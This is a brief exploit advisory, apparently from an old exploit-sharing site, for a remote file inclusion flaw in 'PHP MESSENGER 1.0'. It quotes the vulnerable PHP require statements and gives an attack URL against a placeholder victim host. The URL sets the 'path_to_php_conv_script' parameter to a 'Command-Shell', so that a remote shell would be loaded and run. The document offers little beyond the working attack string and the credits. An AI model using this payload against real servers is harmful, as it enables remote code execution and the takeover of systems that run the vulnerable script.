SaVSaK.CoM | SpC-x - The_BeKiR |

PHP MESSENGER 1.0 Version - Remote File Include Vulnerability

Risk : High

Class: Remote

Script : PHP MESSENGER

Credits : SpC-x

Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

Code :

require ($path_to_php_messenger_script);

if (file_exists($path_to_php_conv_script)) require ($path_to_php_conv_script);

Vulnerable :

http://www.victim.com/PHP MESSENGER/php_messenger.php?path_to_php_conv_script=Command-Shell